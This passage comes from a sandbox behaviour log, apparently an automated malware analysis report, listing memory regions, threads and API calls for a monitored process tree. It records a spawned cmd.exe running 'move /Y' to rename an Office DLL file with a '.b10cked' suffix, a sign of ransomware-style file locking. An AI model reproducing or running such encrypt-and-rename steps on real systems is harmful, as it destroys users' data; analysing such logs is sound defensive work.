0x7ffab000 end_va = 
0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 23344 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 23345 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 23346 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 23347 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23348 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 23349 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 23350 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 23351 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 23352 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 23353 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 23354 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 23355 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 23356 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 
0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 23357 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 23358 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27850 start_va = 0x1860000 end_va = 0x189ffff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 27851 start_va = 0x6bec0000 end_va = 0x6bff2fff entry_point = 0x6bec0000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 27852 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 27887 start_va = 0x9f0000 end_va = 0x9f0fff entry_point = 0x9f0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 27888 start_va = 0xa00000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 27889 start_va = 0x6310000 end_va = 0x634ffff entry_point = 0x0 region_type = private name = "private_0x0000000006310000" filename = "" Region: id = 27890 start_va = 0x6480000 end_va = 0x64bffff entry_point = 0x0 region_type = private name = "private_0x0000000006480000" filename = "" Region: id = 27891 start_va = 0x6650000 end_va = 0x668ffff entry_point = 0x0 region_type = private name = "private_0x0000000006650000" filename = "" Region: id = 27892 start_va = 0x6690000 end_va = 0x6a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000006690000" filename = "" Region: id = 27893 start_va = 0x6f290000 end_va = 0x6f2f0fff entry_point = 0x6f290000 region_type = mapped_file name = 
"wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 36173 start_va = 0xa80000 end_va = 0xa82fff entry_point = 0xa80000 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 36174 start_va = 0xa90000 end_va = 0xa9ffff entry_point = 0xa90000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 36175 start_va = 0xaa0000 end_va = 0xaa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 36176 start_va = 0xab0000 end_va = 0xabffff entry_point = 0xab0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 36177 start_va = 0x1520000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 36178 start_va = 0x1990000 end_va = 0x19cffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 36179 start_va = 0x19e0000 end_va = 0x1a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 36180 start_va = 0x1ba0000 end_va = 0x1bdffff entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 36181 start_va = 0x1f50000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 36182 start_va = 0x1fd0000 end_va = 0x200ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 36183 start_va = 0x4120000 end_va = 
0x415ffff entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 36184 start_va = 0x6a90000 end_va = 0x6c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a90000" filename = "" Region: id = 36185 start_va = 0x724e0000 end_va = 0x72504fff entry_point = 0x724e0000 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 36186 start_va = 0x7ffa1000 end_va = 0x7ffa1fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa1000" filename = "" Region: id = 36187 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 36188 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 36189 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 36190 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Thread: id = 366 os_tid = 0xf0c Thread: id = 367 os_tid = 0xc80 Thread: id = 368 os_tid = 0xa28 Thread: id = 369 os_tid = 0x8e0 Thread: id = 370 os_tid = 0x8dc Thread: id = 371 os_tid = 0x8d8 Thread: id = 372 os_tid = 0x8c8 Thread: id = 373 os_tid = 0x7e0 Thread: id = 374 os_tid = 0x7c8 Thread: id = 375 os_tid = 0x534 Thread: id = 376 os_tid = 0x7d8 Thread: id = 377 os_tid = 0x764 Thread: id = 378 os_tid = 0x75c Thread: id = 379 os_tid = 0x750 Thread: id = 380 os_tid = 0x714 Thread: id = 381 os_tid = 0x710 Thread: id = 382 os_tid = 0x680 Thread: id = 383 os_tid = 0x4cc Thread: id = 384 os_tid = 0x4ac Thread: id = 385 os_tid = 0x498 Thread: id = 386 os_tid = 0x4a8 Thread: id = 387 os_tid = 0x484 Thread: id = 388 os_tid = 0x478 Thread: id = 389 os_tid = 0x470 
Thread: id = 390 os_tid = 0x3f4 Thread: id = 391 os_tid = 0x3e4 Thread: id = 392 os_tid = 0x3d8 Thread: id = 393 os_tid = 0x388 Thread: id = 394 os_tid = 0x378 Thread: id = 395 os_tid = 0x374 Thread: id = 396 os_tid = 0x364 Thread: id = 397 os_tid = 0x35c Thread: id = 402 os_tid = 0x998 Thread: id = 403 os_tid = 0xb80 Thread: id = 613 os_tid = 0xb50 Thread: id = 615 os_tid = 0x99c Thread: id = 616 os_tid = 0x988 Thread: id = 617 os_tid = 0xae8 Thread: id = 666 os_tid = 0x51c Thread: id = 806 os_tid = 0x3dc Thread: id = 827 os_tid = 0xfa4 Thread: id = 829 os_tid = 0xa08 Thread: id = 851 os_tid = 0x88c Thread: id = 852 os_tid = 0x80c Thread: id = 934 os_tid = 0x448 Thread: id = 935 os_tid = 0x3c4 Thread: id = 936 os_tid = 0xfe4 Thread: id = 952 os_tid = 0xf44 Process: id = "299" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16180" os_pid = "0xa7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23419 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23420 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = 
"" Region: id = 23421 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23422 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 23423 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23424 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23425 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23426 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23427 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 23428 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23600 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23601 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23602 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23603 
start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 23604 start_va = 0x740000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 23605 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23606 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23607 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23608 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23609 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23610 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23611 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23612 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = 
"gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23613 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23614 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23615 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23616 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23617 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 23618 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 23619 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 23620 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 23621 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 23622 start_va = 0x580000 end_va = 0x6e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 23623 start_va = 0x750000 end_va = 0x134ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Thread: id = 398 os_tid = 0x858 [0172.983] 
GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efc54 | out: lpSystemTimeAsFileTime=0x2efc54*(dwLowDateTime=0x9cffaf80, dwHighDateTime=0x1d440a9)) [0172.983] GetCurrentProcessId () returned 0xa7c [0172.983] GetCurrentThreadId () returned 0x858 [0172.983] GetTickCount () returned 0x32625 [0172.983] QueryPerformanceCounter (in: lpPerformanceCount=0x2efc4c | out: lpPerformanceCount=0x2efc4c*=22977261650) returned 1 [0172.984] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.984] __set_app_type (_Type=0x1) [0172.984] __p__fmode () returned 0x76b331f4 [0172.984] __p__commode () returned 0x76b331fc [0172.984] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.984] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.985] GetCurrentThreadId () returned 0x858 [0172.985] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x858) returned 0x38 [0172.985] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.985] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.985] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.985] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.985] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efbe4 | out: phkResult=0x2efbe4*=0x0) returned 0x2 [0172.985] VirtualQuery (in: lpAddress=0x2efc1b, lpBuffer=0x2efbb4, dwLength=0x1c | out: lpBuffer=0x2efbb4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.985] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efbb4, dwLength=0x1c | out: 
lpBuffer=0x2efbb4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.985] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efbb4, dwLength=0x1c | out: lpBuffer=0x2efbb4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.985] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efbb4, dwLength=0x1c | out: lpBuffer=0x2efbb4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.985] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efbb4, dwLength=0x1c | out: lpBuffer=0x2efbb4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.985] GetConsoleOutputCP () returned 0x1b5 [0172.985] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.985] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.985] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.985] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.986] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.986] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.986] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.986] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.986] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.986] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.986] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.986] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.986] GetEnvironmentStringsW () returned 0x490210* [0172.986] FreeEnvironmentStringsW (penv=0x490210) returned 1 [0172.987] 
GetEnvironmentStringsW () returned 0x490210* [0172.987] FreeEnvironmentStringsW (penv=0x490210) returned 1 [0172.987] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb54 | out: phkResult=0x2eeb54*=0x40) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x0, lpData=0x2eeb60*=0xa0, lpcbData=0x2eeb58*=0x1000) returned 0x2 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x1, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x0, lpData=0x2eeb60*=0x1, lpcbData=0x2eeb58*=0x1000) returned 0x2 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x0, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x40, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x40, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x0, lpData=0x2eeb60*=0x40, lpcbData=0x2eeb58*=0x1000) returned 0x2 [0172.987] 
RegCloseKey (hKey=0x40) returned 0x0 [0172.987] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb54 | out: phkResult=0x2eeb54*=0x40) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x0, lpData=0x2eeb60*=0x40, lpcbData=0x2eeb58*=0x1000) returned 0x2 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x1, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x0, lpData=0x2eeb60*=0x1, lpcbData=0x2eeb58*=0x1000) returned 0x2 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x0, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x9, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x4, lpData=0x2eeb60*=0x9, lpcbData=0x2eeb58*=0x4) returned 0x0 [0172.987] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb5c, lpData=0x2eeb60, lpcbData=0x2eeb58*=0x1000 | out: lpType=0x2eeb5c*=0x0, lpData=0x2eeb60*=0x9, lpcbData=0x2eeb58*=0x1000) returned 0x2 [0172.987] RegCloseKey (hKey=0x40) returned 0x0 [0172.987] time (in: timer=0x0 | out: 
timer=0x0) returned 0x5b886388 [0172.987] srand (_Seed=0x5b886388) [0172.988] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked\"" [0172.988] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.DLL.trx_dll.b10cked\"" [0172.988] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.988] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x491970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.988] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.988] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.988] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.988] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.988] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.988] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.988] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.988] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0172.988] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.988] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.988] _wcsicmp (_String1="PROMPT", 
_String2="HIGHESTNUMANODENUMBER") returned 8 [0172.988] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.989] GetEnvironmentStringsW () returned 0x492360* [0172.989] FreeEnvironmentStringsW (penv=0x492360) returned 1 [0172.989] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.989] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.989] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.989] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.989] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.989] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.989] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.989] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.989] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.989] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef920 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.989] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, 